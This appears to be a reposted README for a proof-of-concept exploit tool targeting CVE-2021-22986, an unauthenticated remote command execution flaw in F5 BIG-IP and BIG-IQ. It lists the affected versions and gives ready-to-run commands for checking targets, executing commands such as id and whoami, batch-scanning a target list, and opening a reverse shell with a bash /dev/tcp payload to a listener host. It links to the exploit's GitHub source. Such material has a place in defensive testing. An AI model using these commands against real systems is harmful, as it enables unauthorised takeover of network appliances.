BIG-IP Vulnerability – CVE-2021-22986 – PoC

Vuln Impact

This vulnerability allows for unauthenticated attackers with network access to the iControl REST interface, through the BIG-IP management interface and self IP addresses, to execute arbitrary system commands, create or delete files, and disable services. This vulnerability can only be exploited through the control plane and cannot be exploited through the data plane. Exploitation can lead to complete system compromise. The BIG-IP system in Appliance mode is also vulnerable.

Vuln Product

  • F5 BIG-IQ 6.0.0-6.1.0
  • F5 BIG-IQ 7.0.0-7.0.0.1
  • F5 BIG-IQ 7.1.0-7.1.0.2
  • F5 BIG-IP 12.1.0-12.1.5.2
  • F5 BIG-IP 13.1.0-13.1.3.5
  • F5 BIG-IP 14.1.0-14.1.3.1
  • F5 BIG-IP 15.1.0-15.1.2
  • F5 BIG-IP 16.0.0-16.0.1

Vunl Check

Basic usage

python3 CVE_2021_22986.py
use

Vuln check

python3 CVE_2021_22986.py -v true -u https://192.168.174.164
verify

command execute:

python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id
command_exec
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami
exec_2

batch scan

python3 CVE_2021_22986.py -s true -f check.txt
batch_scan

Reserve Shell

python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"
reverse_shell
reverse_shell_ok

New POC

python3 newpoc.py https://192.168.174.164
newpoc

Download from GitHub (Original Source)

https://github.com/Al1ex/CVE-2021-22986

Reference

https://support.f5.com/csp/article/K03009991

https://github.com/safesword/F5_RCE

https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986

https://github.com/Udyz/CVE-2021-22986-SSRF2RCE